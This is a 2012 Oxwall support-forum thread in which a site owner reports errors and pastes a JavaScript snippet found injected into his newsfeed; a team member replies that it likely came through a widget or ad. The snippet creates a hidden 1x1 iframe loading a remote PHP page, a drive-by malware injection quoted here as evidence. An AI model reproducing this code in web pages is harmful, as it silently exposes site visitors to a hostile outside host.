We build. You grow.

Get best community software here

Start a social network, a fan-site, an education project with oxwall - free opensource community software

site malfunctions, ParserError, and not show pictures | Forum

Ricardo
Ricardo Dec 7 '12
My site has stopped working well, I have not made any changes, nor have I updated any plugin, now when I send any comments, mail, etc. I get a ParserError.
Neither can view photos, stays loading but not working
I tried to create a test user and neither shows the capcha.

Just below the box to add newsfeed see this message: All problems have appeared suddenly without any changes on the software.

(function () { var bqd = document.createElement('iframe'); bqd.src = 'http://espace-en-soi.org/ayurveda/rel.php'; bqd.style.position = 'absolute'; bqd.style.border = '0'; bqd.style.height = '1px'; bqd.style.width = '1px'; bqd.style.left = '1px'; bqd.style.top = '1px'; if (!document.getElementById('bqd')) { document.write(''); document.getElementById('bqd').appendChild(bqd); }})();" class="newsfeed-attachment-preview ow_smallmargin">

Could be a malware?

For any of you happened something similar?
 Someone has idea how to fix it?

Thanks in advance

The Forum post is edited by Ricardo Dec 7 '12
Ricardo
Ricardo Dec 7 '12
Ok. Found the problem.
There is a malware on the site.
Now I have to find out if entered by the server or software problem.
Alia Team
Alia Dec 11 '12
Ricardo, most likely you or one of your users have inserted some kind of javascript into one of the widgets or ads ( if you are using "Advertisement" plugin) which then have caused this error.